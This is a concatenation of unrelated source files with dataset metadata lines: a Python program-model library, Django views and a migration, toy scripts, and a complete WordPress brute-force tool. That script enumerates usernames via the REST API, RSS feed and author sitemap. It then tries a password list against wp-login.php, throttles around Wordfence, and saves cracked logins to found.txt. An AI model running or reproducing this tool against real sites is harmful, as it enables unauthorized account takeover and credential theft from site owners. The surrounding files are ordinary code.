def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. """ def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. """ CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. `while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def __len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
1.765625
2
api/views/todo_views.py
felipe-menelau/todo-list-web
0
5590
from django.contrib.auth.models import User from rest_framework import viewsets, status from rest_framework.response import Response from rest_framework.permissions import IsAuthenticated, IsAdminUser from api.serializers import TODOListSerializer from api.models import TODOList class TODOListViewSet(viewsets.ModelViewSet): permission_classes = [IsAuthenticated] serializer_class = TODOListSerializer def get_queryset(self): user = self.request.user return TODOList.objects.filter(owner=self.request.user).order_by('created_at') def create(self, request, *args, **kwargs): request.data['owner'] = request.user.id return super(self.__class__, self).create(request, *args, **kwargs)
2.015625
2
Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py
techkey/PTVS
404
5591
# ProgramB.py print('Hello World')
1.171875
1
donation/migrations/0043_auto_20180109_0012.py
effective-altruism-australia/donation-portal
1
5592
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion def copy_existing_referrals_into_new_field(apps, schema_editor): Pledge = apps.get_model('donation', 'Pledge') Referral = apps.get_model('donation', 'Referral') reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct() for reason in reasons: if reason: # Filter out None and u'' Referral.objects.create(reason=reason) for pledge in Pledge.objects.all(): reason = pledge.how_did_you_hear_about_us if reason: pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason) pledge.save() class Migration(migrations.Migration): dependencies = [ ('donation', '0042_amend_donation_view'), ] operations = [ migrations.CreateModel( name='Referral', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('reason', models.CharField(max_length=256)), ], ), migrations.AddField( model_name='pledge', name='how_did_you_hear_about_us_db', field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True), ), migrations.RunPython(copy_existing_referrals_into_new_field) ]
1.867188
2
python/is_even.py
c1m50c/twitter-examples
0
5593
<reponame>c1m50c/twitter-examples<gh_stars>0 def is_even(i: int) -> bool: if i == 1: return False elif i == 2: return True elif i == 3: return False elif i == 4: return True elif i == 5: ... # Never do that! Use one of these instead... is_even = lambda i : i % 2 == 0 is_even = lambda i : not i & 1 is_odd = lambda i : not is_even(i)
3.5
4
wordpress-brute.py
RandomRobbieBF/wordpress-bf
1
5594
<filename>wordpress-brute.py #!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
2.5
2
graph_search/week2/assignment_dijkstra_shortest_paths.py
liaoaoyuan97/standford_algorithms_specialization
0
5595
